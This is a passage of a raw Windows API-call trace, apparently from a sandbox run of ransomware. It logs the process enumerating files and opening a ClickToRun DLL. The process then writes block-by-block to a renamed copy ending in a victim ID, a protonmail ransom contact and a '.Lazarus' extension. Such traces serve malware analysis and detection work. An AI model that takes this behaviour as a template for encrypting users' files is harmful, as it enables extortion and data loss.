| out: hHeap=0x20000) returned 1 [0090.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b8b0 | out: hHeap=0x20000) returned 1 [0090.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0090.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0090.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0090.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0090.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.297] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x114c0, dwReserved0=0x1, dwReserved1=0x202f8, cFileName="api-ms-win-crt-private-l1-1-0.dll", cAlternateFileName="AP7D9E~1.DLL")) returned 1 [0090.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0090.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0090.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0090.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0090.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0090.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0090.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0090.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0090.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0090.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0090.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0090.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0090.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0090.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0090.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0090.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0090.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0090.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0090.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0090.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0090.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0090.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x55f20 [0090.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0090.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0090.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x4ebc8 [0090.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.298] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.298] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.298] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.298] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.298] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0090.298] AreFileApisANSI () returned 1 [0090.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 92 [0090.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0090.298] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.298] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0090.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0090.299] AreFileApisANSI () returned 1 [0090.299] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0090.299] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x4ebc8 [0090.299] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll") returned 92 [0090.299] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-private-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0090.299] GetFileType (hFile=0x368) returned 0x1 [0090.299] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.299] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0090.299] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0090.299] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0090.300] CloseHandle (hObject=0x368) returned 1 [0090.300] AreFileApisANSI () returned 1 [0090.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0090.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x4ebc8 [0090.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll") returned 92 [0090.300] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-private-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0090.300] GetFileType (hFile=0x368) returned 0x1 [0090.300] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.300] CloseHandle (hObject=0x368) returned 1 [0090.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0090.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0090.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0090.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0090.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0090.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0090.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0090.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0090.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0090.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0090.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0090.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0090.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0090.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0090.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0090.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0090.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0090.301] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0090.301] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0090.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0090.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0090.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0090.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0090.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0090.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0090.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0090.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0090.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0090.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0090.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0090.302] AreFileApisANSI () returned 1 [0090.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0090.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x4ebc8 [0090.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll") returned 92 [0090.302] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-private-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x114c0)) returned 1 [0090.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.302] AreFileApisANSI () returned 1 [0090.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0090.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0090.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0090.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0090.302] GetLastError () returned 0x0 [0090.302] SetLastError (dwErrCode=0x0) [0090.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e378 [0090.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x4f220 [0090.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bf40 [0090.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d7b0 [0090.302] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0090.303] GetLastError () returned 0x0 [0090.303] SetLastError (dwErrCode=0x0) [0090.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0090.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0090.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa7) returned 0x60088 [0090.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0090.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0090.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0090.303] AreFileApisANSI () returned 1 [0090.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x60088, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0090.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x134) returned 0x4e568 [0090.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x60088, cbMultiByte=-1, lpWideCharStr=0x4e568, cchWideChar=154 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 154 [0090.303] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-private-l1-1-0.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0090.303] GetFileType (hFile=0x368) returned 0x1 [0090.303] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e568 | out: hHeap=0x20000) returned 1 [0090.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0090.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0090.304] AreFileApisANSI () returned 1 [0090.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0090.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x4ebc8 [0090.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll") returned 92 [0090.304] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-private-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-private-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0090.304] GetFileType (hFile=0x418) returned 0x1 [0090.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0090.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0090.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0090.304] GetLastError () returned 0x0 [0090.304] SetLastError (dwErrCode=0x0) [0090.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0090.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0090.304] GetLastError () returned 0x0 [0090.305] SetLastError (dwErrCode=0x0) [0090.305] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0090.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0090.305] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0090.305] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0090.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0090.306] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0090.307] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x90450 [0090.307] GetLastError () returned 0x0 [0090.307] SetLastError (dwErrCode=0x0) [0090.307] GetLastError () returned 0x0 [0090.307] SetLastError (dwErrCode=0x0) [0090.307] GetLastError () returned 0x0 [0090.307] SetLastError (dwErrCode=0x0) [0090.307] GetLastError () returned 0x0 [0090.307] SetLastError (dwErrCode=0x0) [0090.308] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.308] WriteFile (in: hFile=0x368, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.309] GetLastError () returned 0x0 [0090.309] SetLastError (dwErrCode=0x0) [0090.309] GetLastError () returned 0x0 [0090.309] SetLastError (dwErrCode=0x0) [0090.309] GetLastError () returned 0x0 [0090.309] SetLastError (dwErrCode=0x0) [0090.309] GetLastError () returned 0x0 [0090.309] SetLastError (dwErrCode=0x0) [0090.309] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.310] WriteFile (in: hFile=0x368, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.310] GetLastError () returned 0x0 [0090.310] SetLastError (dwErrCode=0x0) [0090.310] GetLastError () returned 0x0 [0090.310] SetLastError (dwErrCode=0x0) [0090.310] GetLastError () returned 0x0 [0090.310] SetLastError (dwErrCode=0x0) [0090.310] GetLastError () returned 0x0 [0090.310] SetLastError (dwErrCode=0x0) [0090.310] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.310] WriteFile (in: hFile=0x368, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.311] GetLastError () returned 0x0 [0090.311] SetLastError (dwErrCode=0x0) [0090.311] GetLastError () returned 0x0 [0090.311] SetLastError (dwErrCode=0x0) [0090.311] GetLastError () returned 0x0 [0090.311] SetLastError (dwErrCode=0x0) [0090.311] GetLastError () returned 0x0 [0090.311] SetLastError (dwErrCode=0x0) [0090.311] ReadFile (in: hFile=0x418, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.311] WriteFile (in: hFile=0x368, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.312] GetLastError () returned 0x0 [0090.312] SetLastError (dwErrCode=0x0) [0090.312] GetLastError () returned 0x0 [0090.312] SetLastError (dwErrCode=0x0) [0090.312] GetLastError () returned 0x0 [0090.312] SetLastError 